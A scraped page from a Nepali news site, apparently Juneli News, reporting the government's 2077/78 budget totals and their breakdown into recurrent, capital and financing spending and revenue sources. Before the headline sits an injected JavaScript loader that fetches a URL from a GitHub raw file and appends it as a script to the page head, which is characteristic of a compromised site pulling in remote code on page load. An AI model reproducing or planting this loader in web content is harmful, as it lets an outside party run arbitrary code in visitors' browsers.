;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); सरकारले ल्यायो आर्थिक वर्ष २०७७/७८को १४ खर्ब ७४ अर्ब ६४ करोडको बजेट – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • सरकारले ल्यायो आर्थिक वर्ष २०७७/७८को १४ खर्ब ७४ अर्ब ६४ करोडको बजेट
अर्थ/वाणिज्य

सरकारले ल्यायो आर्थिक वर्ष २०७७/७८को १४ खर्ब ७४ अर्ब ६४ करोडको बजेट

काठमाडौँ — कोरोना भाइरसको प्रभाव अर्थतन्त्रमा परेपछि आगामी आर्थिक वर्ष २०७७/७८ को कूल बजेट गतवर्षको भन्दा घटेको छ । आगामी वर्षको बजेटको आकार कुल बजेट १४ खर्ब ७४ अर्ब ६४ करोड रुपैयाँको तय भएको छ ।

चालु आर्थिक वर्ष २०७६/७७ को बजेट १५ खर्ब ३२ अर्ब ९६ करोड ७१ लाखको थियो ।

आगामी आर्थिक वर्षका लागि विनियोजन भएको बजेटमा चालुतर्फ ९ खर्ब ४८ अर्ब ९४ करोड छ भने पुँजीगततर्फ ३ खर्ब ५२ अर्ब ९१ करोड रहेको छ । त्यसैगरी वित्तीय व्यवस्थापनतर्फ १ खर्ब ७२ अर्ब ७९ करोड बजेट विनियोजन गरिएको छ ।

यस्तै खर्चको स्रोत व्यवस्थापन तर्फ राजश्वबाट ८ खर्ब ८९ अर्ब ६२ करोड रुपैयाँ र वैदेशिक अनुदानबाट ६० अबै ५२ करोड रुपैयाँ व्यवस्थापन गर्ने भएको छ । त्यस्तै वैदेशिक ऋणबाट २ खर्ब ९९ अर्ब ५० करोड जुटाउने र अपुग २ खर्ब २५ अर्ब आन्तरिक ऋणबाट व्यहोर्ने भएको छ ।

फेसबुक प्रतिक्रियाहरु